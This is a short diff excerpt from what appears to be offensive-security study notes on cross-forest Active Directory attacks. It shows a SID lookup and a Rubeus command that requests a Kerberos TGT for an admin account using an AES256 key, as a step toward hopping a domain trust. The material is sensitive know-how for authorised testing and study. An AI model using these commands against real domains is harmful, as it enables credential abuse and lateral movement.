mvc1009/hackingnotes/_docs/active-directory/cross-forest-attacks.md

 ConvertFrom-SID  S-1-5-21-3263068140-2042693922-2891547269-1132
 ```

 To hop a domain trust using Kerberos, we first need an inter-realm Key.
-We can obtain a TGT for the target user.
+We need a TGT for the target user.

 ```
 .\Rubeus.exe asktgt /user:admin /domain:corp.local /aes256:<aes256> /nowrap